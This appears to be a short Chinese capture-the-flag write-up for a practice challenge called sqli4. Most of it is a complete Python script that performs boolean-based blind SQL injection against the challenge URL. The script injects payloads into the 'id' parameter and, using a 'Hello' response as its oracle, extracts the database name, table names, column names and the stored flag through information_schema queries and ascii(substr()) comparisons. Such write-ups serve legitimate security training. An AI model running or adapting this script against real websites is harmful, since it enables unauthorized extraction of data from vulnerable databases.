实验吧-sqli4
雨落
雨落




一道盲注题

脚本:

#bool型SQL盲注,py脚本--  
#https://blog.csdn.net/weixin_40709439/article/details/81355856
import requests as rq
import re
import time

# Module-level settings shared by every c_* function below.
url='http://ctf5.shiyanbar.com/web/index_3.php'  # CTF practice endpoint; each function appends its "?id=..." query string to this
mystr="0123456789abcdefghijklmnopqrstuvwxyz"  # candidate alphabet tried for database-name and table-name characters
m_str="sqcwertyuioplkjhgfdazxvbnm"  # candidate alphabet tried for column-name characters (letters only, author's ordering)
flag_str=mystr+"ABCDEFGHIJKLMNOPQRSTUVWXYZ}@_{"  # wider alphabet (upper case plus '}', '@', '_', '{') used when reading cell data


#猜数据库名长度
def c_dblength() -> int:
    """Guess the length of the current database name (tries 1..4) and return it.

    Each request appends ``and length(database())=N`` to the ``id`` parameter
    and reads exactly one signal from the reply: whether the substring
    ``"Hello"`` appears in the response body.  The first N that produces
    "Hello" is printed and returned; 0 is returned when none of 1..4 does.
    """
    t=0
    for i in range(1,5):
        data="?id=1' and length(database())=%d%%23" %(i)#'%' must be doubled to survive %-formatting; '%23' is a URL-encoded '#'
        myurl=url+data
        #print (myurl)
        response = rq.get(myurl)
        # The only oracle the script reads: "Hello" present -> condition treated as true
        if "Hello" in response.text:
            print (i)
            t=i
            break
    return t
#猜数据库名
def c_dbname(len: int) -> None:
    """Recover the database name one character at a time and print it.

    ``len`` is the name length (as returned by c_dblength); the parameter
    name shadows the builtin ``len`` inside this function.  For each
    position 1..len every character of ``mystr`` is tried via
    ``ascii(substr(database(),i,1))=<code>`` until the reply contains
    "Hello".  A position with no matching character is skipped without
    any marker, so the printed name can be shorter than ``len``.
    """
    flag=""
    for i in range(1,len+1):
        for j in mystr:
            char_ascii=ord(j)  # ord() gives the decimal code point, compared against ascii() on the server side
            data="?id=1' and ascii(substr(database(),%d,1))=%s%%23" %(i,char_ascii)#'%' must be doubled to survive %-formatting
            myurl=url+data
            #print (myurl)
            re = rq.get(myurl)  # NOTE: local name shadows the imported `re` module within this function
            if "Hello" in re.text:
                flag+=j
                break
    print(flag)

#猜表个数
def c_tbcount() -> int:
    """Guess how many tables the current database has (tries 1..3) and return it.

    Same oracle as c_dblength: the count is compared against
    ``count(table_name)`` from ``information_schema.tables`` for the
    current schema, and "Hello" in the reply means the comparison held.
    The first matching count is printed and returned; 0 if none of 1..3
    matches.
    """
    t=0
    for i in range(1,4):#the author notes the answer here is 2
        data="?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=%d%%23" %(i)#'%' must be doubled to survive %-formatting
        myurl=url+data
        #print (myurl)
        response = rq.get(myurl)
        if "Hello" in response.text:
            print (i)
            t=i
            break
    return t


#猜表名 (跟猜数据库一样,猜出长度,然后猜表名)
def c_tbname(ct: int) -> None:
    """Recover and print the names of the first ``ct`` tables in the current database.

    Works like c_dbname, table by table (``limit i,1`` selects the i-th
    table name): first the name length is guessed from 1..7, then each
    position is resolved against ``mystr``.  Per table the length and then
    the recovered name are printed; every candidate query string is also
    printed, and the script pauses 2 s before each name-character request.
    Always returns None.
    """
    
    for i in range(0,ct):
        # Guess the length of the i-th table name
        t1=0
        for j in range(1,8):
            
            data="?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit %d,1))=%d%%23" %(i,j)
            myurl=url+data
            #print(myurl)
            re = rq.get(myurl)  # NOTE: local name shadows the imported `re` module within this function
            if "Hello" in re.text:
                t1=j
                break
        print(t1)
        # Guess the table name character by character (a position with no hit is skipped)
        flag=""
        for j in range(1,t1+1):
            for k in mystr:
                char_ascii=ord(k)
                data="?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%s%%23" %(i,j,char_ascii)
                print(data)
                myurl=url+data
                time.sleep(2)  # fixed pause between requests
                re = rq.get(myurl)
                #print(re.text)
                if "Hello" in re.text:
                    flag+=k
                    break
        print(flag)

    return

###############################################################  猜列
#猜列名
def c_colname(mytables: str) -> None:
    """Recover and print the first column name of table ``mytables``.

    Only the first column is read: the sub-select uses ``limit 1`` on
    ``information_schema.columns`` filtered by ``table_name``.  The length
    is guessed from 1..7, then each position is resolved against ``m_str``
    (letters only).  The length and the recovered name are printed, as is
    every candidate query string.  Always returns None.
    """
    
    for i in range(0,1):  # the outer loop runs exactly once; the author left it in place
        # Guess the column-name length
        t1=0
        for j in range(1,8):
            data="?id=1' and length((select column_name from information_schema.columns where table_name='%s' limit 1))=%d%%23" %(mytables,j)#limit 1 picks the first matching row
            myurl=url+data
            #print(data)
            re = rq.get(myurl)  # NOTE: local name shadows the imported `re` module within this function
            if "Hello" in re.text:
                t1=j
                break
        print(t1)
        # Guess the column name character by character (a position with no hit is skipped)
        flag=""
        for j in range(1,t1+1):
            for k in m_str:
                char_ascii=ord(k)
                data="?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='%s' limit 1),%d,1)))=%s%%23" %(mytables,j,char_ascii)
                print(data)
                myurl=url+data
                #time.sleep(2)
                re = rq.get(myurl)
                #print(re.text)
                if "Hello" in re.text:
                    flag+=k
                    break
        print(flag)

    return


#得flag 猜数据
def c_flag(mytable: str, mycolumn: str) -> None:
    """Read the value of ``mycolumn`` from ``mytable`` and print it.

    Three phases, all driven by the "Hello" oracle: (1) the row count is
    guessed from 1..9 and printed; (2) the value length is guessed from
    1..39 and printed once per counted row; (3) each position is resolved
    against ``flag_str`` with a 1 s pause before every request, printing the
    partial value after each hit and after each row.  Note that the queries
    in phases 2 and 3 do not reference the row index ``i`` (no row selector
    in ``select %s from %s``), so every row iteration issues the same
    queries.  The local ``len`` shadows the builtin inside this function.
    """
    # Phase 1: how many rows the table holds
    t=0
    for i in range(1,10):
        data="?id=1' and (select count(*) from %s )=%d%%23" %(mytable,i)
        myurl=url+data
        #print (data)
        response = rq.get(myurl)
        if "Hello" in response.text:
            #print (i)
            t=i
            break
    print(t)
    # Phase 2: length of the value (this format string alone has a space before '%%23')
    len=0
    for i in range(1,t+1):
        for j in range(1,40):
            data="?id=1' and length((select %s from %s))=%d %%23" %(mycolumn,mytable,j)
            myurl=url+data
            #print(data)
            re = rq.get(myurl)  # NOTE: local name shadows the imported `re` module within this function
            if "Hello" in re.text:
                len=j
                break
        print(len)

    # Phase 3: read the value character by character (a position with no hit is skipped)
    flag=""
    for i in range(1,t+1):
        for j in range(1,len+1):
            for k in flag_str:
                data="?id=1' and (ascii(substr((select %s from %s),%d,1)))=%s%%23" % (mycolumn,mytable,j,ord(k))
                myurl=url+data
                #print (data)
                time.sleep(1)  # fixed pause between requests
                response = rq.get(myurl)
                if "Hello" in response.text:
                    flag+=k
                    print(flag)
                    break
        print(flag)



if __name__ == '__main__':
    # Earlier steps are left commented out; the author ran them once and recorded the results inline.
    #len=c_dblength()# length was 4
    #c_dbname(len)  # guess the database name
    #ct = c_tbcount()

    #c_tbname(2)  # guess table names: gave the two tables flag and web1
    #c_colname("flag") # guess columns: gave the column flag
    c_flag("flag","flag")    # read the flag value
